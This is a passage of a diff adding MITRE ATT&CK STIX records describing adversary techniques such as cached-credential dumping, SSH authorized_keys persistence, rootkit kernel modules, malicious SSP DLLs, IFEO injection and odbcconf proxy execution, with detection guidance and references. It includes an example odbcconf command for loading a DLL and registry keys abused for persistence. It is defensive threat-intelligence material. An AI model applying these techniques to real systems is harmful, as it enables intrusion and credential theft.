MimiKatz to Unix)\n\nNote: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib mscache)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Ed Williams, Trustwave, SpiderLabs", + "Tim (Wadhwa-)Brown", + "Yves Yonan" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.\n\nDetection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--6add2ab5-2711-4e9d-87c8-7a0be8531530", + "created": "2020-02-21T15:42:25.991Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1003/005", + "external_id": "T1003.005" + }, + { + "source_name": "PassLib mscache", + "description": "Eli Collins. (2016, November 25). Windows' Domain Cached Credentials v2. Retrieved February 21, 2020.", + "url": "https://passlib.readthedocs.io/en/stable/lib/passlib.hash.msdcc2.html" + }, + { + "source_name": "ired mscache", + "description": "Mantvydas Baranauskas. (2019, November 16). Dumping and Cracking mscash - Cached Domain Credentials. Retrieved February 21, 2020.", + "url": "https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-and-cracking-mscash-cached-domain-credentials" + }, + { + "source_name": "Microsoft - Cached Creds", + "description": "Microsoft. (2016, August 21). Cached and Stored Credentials Technical Overview. Retrieved February 21, 2020.", + "url": "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh994565(v%3Dws.11)" + }, + { + "source_name": "Powersploit", + "description": "PowerSploit. (n.d.). Retrieved December 4, 2014.", + "url": "https://github.com/mattifestation/PowerSploit" + }, + { + "source_name": "Brining MimiKatz to Unix", + "description": "Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing Mimikatz et al to UNIX. Retrieved October 13, 2021.", + "url": "https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-03T17:38:21.121Z", + "name": "SSH Authorized Keys", + "description": "Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config.\n\nAdversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or rest API. For example, by using the Google Cloud CLI’s “add-metadata” command an adversary may add SSH keys to a user account.(Citation: Google Cloud Add Metadata)(Citation: Google Cloud Privilege Escalation) Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.(Citation: Azure Update Virtual Machines) This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm) It may also lead to privilege escalation where the virtual machine or instance has distinct permissions from the requesting user.\n\nWhere authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user. \n\nSSH keys can also be added to accounts on network devices, such as with the `ip ssh pubkey-chain` [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) command.(Citation: cisco_ip_ssh_pubkey_ch_cmd)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Tony Lambert, Red Canary", + "Dror Alon, Palo Alto Networks", + "Or Kliger, Palo Alto Networks", + "Austin Clark, @c2defense", + "Arad Inbar, Fidelis Security" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Use file integrity monitoring to detect changes made to the authorized_keys file for each user on a system. Monitor for suspicious processes modifying the authorized_keys file. In cloud environments, monitor instances for modification of metadata and configurations.\n\nMonitor for changes to and suspicious processes modifiying /etc/ssh/sshd_config.\n\nFor network infrastructure devices, collect AAA logging to monitor for rogue SSH keys being added to accounts.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "IaaS", + "Network" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4", + "created": "2020-06-24T12:42:35.144Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1098/004", + "external_id": "T1098.004" + }, + { + "source_name": "Venafi SSH Key Abuse", + "description": "Blachman, Y. (2020, April 22). Growing Abuse of SSH Keys: Commodity Malware Campaigns Now Equipped with SSH Capabilities. Retrieved June 24, 2020.", + "url": "https://www.venafi.com/blog/growing-abuse-ssh-keys-commodity-malware-campaigns-now-equipped-ssh-capabilities" + }, + { + "source_name": "Google Cloud Privilege Escalation", + "description": "Chris Moberly. (2020, February 12). Tutorial on privilege escalation and post exploitation tactics in Google Cloud Platform environments. Retrieved April 1, 2022.", + "url": "https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/" + }, + { + "source_name": "cisco_ip_ssh_pubkey_ch_cmd", + "description": "Cisco. (2021, August 23). ip ssh pubkey-chain. Retrieved July 13, 2022.", + "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/d1/sec-d1-cr-book/sec-cr-i3.html#wp1254331478" + }, + { + "source_name": "Cybereason Linux Exim Worm", + "description": "Cybereason Nocturnus. (2019, June 13). New Pervasive Worm Exploiting Linux Exim Server Vulnerability. Retrieved June 24, 2020.", + "url": "https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability" + }, + { + "source_name": "Google Cloud Add Metadata", + "description": "Google Cloud. (2022, March 31). gcloud compute instances add-metadata. Retrieved April 1, 2022.", + "url": "https://cloud.google.com/sdk/gcloud/reference/compute/instances/add-metadata" + }, + { + "source_name": "Azure Update Virtual Machines", + "description": "Microsoft. (n.d.). Virtual Machines - Update. Retrieved April 1, 2022.", + "url": "https://docs.microsoft.com/en-us/rest/api/compute/virtual-machines/update" + }, + { + "source_name": "SSH Authorized Keys", + "description": "ssh.com. (n.d.). Authorized_keys File in SSH. Retrieved June 24, 2020.", + "url": "https://www.ssh.com/ssh/authorized_keys/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Kernel Modules and Extensions", + "description": "Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. (Citation: Linux Kernel Programming) When used maliciously, Loadable Kernel Modules (LKMs) can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide) Adversaries can use loadable kernel modules to covertly persist on a system and evade defenses. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)\n\nCommon features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview)\n\nKernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands. Several examples have been found where this can be used. (Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken) Examples have been found in the wild. (Citation: Securelist Ventir)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Jeremy Galloway", + "Red Canary" + ], + "x_mitre_detection": "LKMs are typically loaded into /lib/modules and have had the extension .ko (\"kernel object\") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)\n\nMany LKMs require Linux headers (specific to the target kernel) in order to compile properly. \nThese are typically obtained through the operating systems package manager and installed like a normal package.\n\nAdversaries will likely run these commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview)\n\nOn Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)\n\nOn RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)\n\nLoading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands:modprobe insmod lsmod rmmod modinfo (Citation: Linux Loadable Kernel Module Insert and Remove LKMs)\n\nFor macOS, monitor for execution of kextload commands and correlate with other unknown or suspicious activity.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "root" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--6be14413-578e-46c1-8304-310762b3ecd5", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1215", + "external_id": "T1215" + }, + { + "source_name": "Linux Kernel Programming", + "description": "Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel Module Programming Guide. Retrieved April 6, 2018.", + "url": "https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf" + }, + { + "source_name": "Linux Kernel Module Programming Guide", + "description": "Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs. Retrieved April 6, 2018.", + "url": "http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html" + }, + { + "source_name": "Volatility Phalanx2", + "description": "Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.", + "url": "https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html" + }, + { + "source_name": "CrowdStrike Linux Rootkit", + "description": "Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit. Retrieved December 21, 2017.", + "url": "https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/" + }, + { + "source_name": "GitHub Reptile", + "description": "Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved April 9, 2018.", + "url": "https://github.com/f0rb1dd3n/Reptile" + }, + { + "source_name": "GitHub Diamorphine", + "description": "Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.", + "url": "https://github.com/m0nad/Diamorphine" + }, + { + "source_name": "iDefense Rootkit Overview", + "description": "Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved April 6, 2018.", + "url": "http://www.megasecurity.org/papers/Rootkits.pdf" + }, + { + "source_name": "RSAC 2015 San Francisco Patrick Wardle", + "description": "Wardle, P. (2015, April). Malware Persistence on OS X Yosemite. Retrieved April 6, 2018.", + "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf" + }, + { + "source_name": "Synack Secure Kernel Extension Broken", + "description": "Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel Extension Loading’ is Broken. Retrieved April 6, 2018.", + "url": "https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/" + }, + { + "source_name": "Securelist Ventir", + "description": "Mikhail, K. (2014, October 16). The Ventir Trojan: assemble your MacOS spy. Retrieved April 6, 2018.", + "url": "https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/" + }, + { + "source_name": "Wikipedia Loadable Kernel Module", + "description": "Wikipedia. (2018, March 17). Loadable kernel module. Retrieved April 9, 2018.", + "url": "https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux" + }, + { + "source_name": "Linux Loadable Kernel Module Insert and Remove LKMs", + "description": "Henderson, B. (2006, September 24). How To Insert And Remove LKMs. Retrieved April 9, 2018.", + "url": "http://tldp.org/HOWTO/Module-HOWTO/x197.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Security Support Provider", + "description": "Windows Security Support Provider (SSP) DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages and HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.\n (Citation: Graeber 2014)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor the Registry for changes to the SSP Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned SSP DLLs try to load into the LSA by setting the Registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\LSASS.exe with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--6c174520-beea-43d9-aac6-28fb77f3e446", + "created": "2017-05-31T21:31:13.447Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1101", + "external_id": "T1101" + }, + { + "source_name": "Graeber 2014", + "description": "Graeber, M. (2014, October). Analysis of Malicious Security Support Provider DLLs. Retrieved March 1, 2017.", + "url": "http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html" + }, + { + "source_name": "Microsoft Configure LSA", + "description": "Microsoft. (2013, July 31). Configuring Additional LSA Protection. Retrieved June 24, 2015.", + "url": "https://technet.microsoft.com/en-us/library/dn408187.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Network Security Appliances", + "description": "Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598).(Citation: Nmap Firewalls NIDS) Information about network security appliances may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--6c2957f9-502a-478c-b1dd-d626c0659413", + "created": "2020-10-02T16:01:35.350Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1590/006", + "external_id": "T1590.006" + }, + { + "source_name": "Nmap Firewalls NIDS", + "description": "Nmap. (n.d.). Chapter 10. Detecting and Subverting Firewalls and Intrusion Detection Systems. Retrieved October 20, 2020.", + "url": "https://nmap.org/book/firewalls.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Image File Execution Options Injection", + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\\dbg\\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nIFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger values in the Registry under HKLM\\SOFTWARE{\\Wow6432Node}\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\ where <executable> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nIFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)\n\nSimilar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures \"cmd.exe,\" or another program that provides backdoor access, as a \"debugger\" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the \"debugger\" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)\n\nSimilar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.\n\nMalware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Oddvar Moe, @oddvarmoe" + ], + "x_mitre_detection": "Monitor for abnormal usage of the GFlags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nMonitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Elastic Process Injection July 2017)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--6d4a7fb3-5a24-42be-ae61-6728a2b581f6", + "created": "2020-01-24T15:05:58.384Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1546/012", + "external_id": "T1546.012" + }, + { + "source_name": "Microsoft Dev Blog IFEO Mar 2010", + "description": "Shanbhag, M. (2010, March 24). Image File Execution Options (IFEO). Retrieved December 18, 2017.", + "url": "https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/" + }, + { + "source_name": "Microsoft GFlags Mar 2017", + "description": "Microsoft. (2017, May 23). GFlags Overview. Retrieved December 18, 2017.", + "url": "https://docs.microsoft.com/windows-hardware/drivers/debugger/gflags-overview" + }, + { + "source_name": "Microsoft Silent Process Exit NOV 2017", + "description": "Marshall, D. & Griffin, S. (2017, November 28). Monitoring Silent Process Exit. Retrieved June 27, 2018.", + "url": "https://docs.microsoft.com/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit" + }, + { + "source_name": "Oddvar Moe IFEO APR 2018", + "description": "Moe, O. (2018, April 10). Persistence using GlobalFlags in Image File Execution Options - Hidden from Autoruns.exe. Retrieved June 27, 2018.", + "url": "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/" + }, + { + "source_name": "Tilbury 2014", + "description": "Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse. Retrieved November 12, 2014.", + "url": "http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/" + }, + { + "source_name": "Elastic Process Injection July 2017", + "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", + "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + }, + { + "source_name": "FSecure Hupigon", + "description": "FSecure. (n.d.). Backdoor - W32/Hupigon.EMV - Threat Description. Retrieved December 18, 2017.", + "url": "https://www.f-secure.com/v-descs/backdoor_w32_hupigon_emv.shtml" + }, + { + "source_name": "Symantec Ushedix June 2008", + "description": "Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December 18, 2017.", + "url": "https://www.symantec.com/security_response/writeup.jsp?docid=2008-062807-2501-99&tabid=2" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Odbcconf", + "description": "Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) The Odbcconf.exe binary may be digitally signed by Microsoft.\n\nAdversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR \"C:\\Users\\Public\\file.dll\"}). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) \n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of odbcconf.exe. Compare recent invocations of odbcconf.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of odbcconf.exe may also be useful in determining the origin and purpose of the DLL being loaded.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Digital Certificate Validation", + "Application control" + ], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--6e3bd510-6b33-41a4-af80-2d80f3ee0071", + "created": "2020-01-24T15:01:32.917Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1218/008", + "external_id": "T1218.008" + }, + { + "source_name": "Microsoft odbcconf.exe", + "description": "Microsoft. (2017, January 18). ODBCCONF.EXE. Retrieved March 7, 2019.", + "url": "https://docs.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-2017" + }, + { + "source_name": "LOLBAS Odbcconf", + "description": "LOLBAS. (n.d.). Odbcconf.exe. Retrieved March 7, 2019.", + "url": "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/" + }, + { + "source_name": "TrendMicro Squiblydoo Aug 2017", + "description": "Bermejo, L., Giagone, R., Wu, R., and Yarochkin, F. (2017, August 7). Backdoor-carrying Emails Set Sights on Russian-speaking Businesses. Retrieved March 7, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/" + }, + { + "source_name": "TrendMicro Cobalt Group Nov 2017", + "description": "Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November 20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit Against Russian Banks. Retrieved March 7, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Search Engines", + "description": "Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)\n\nAdversaries may craft various search engine queries depending on what information they seek to gather. Threat actors may use search engines to harvest general information about victims, as well as use specialized queries to look for spillages/leaks of sensitive information such as network details or credentials. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Valid Accounts](https://attack.mitre.org/techniques/T1078) or [Phishing](https://attack.mitre.org/techniques/T1566)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + 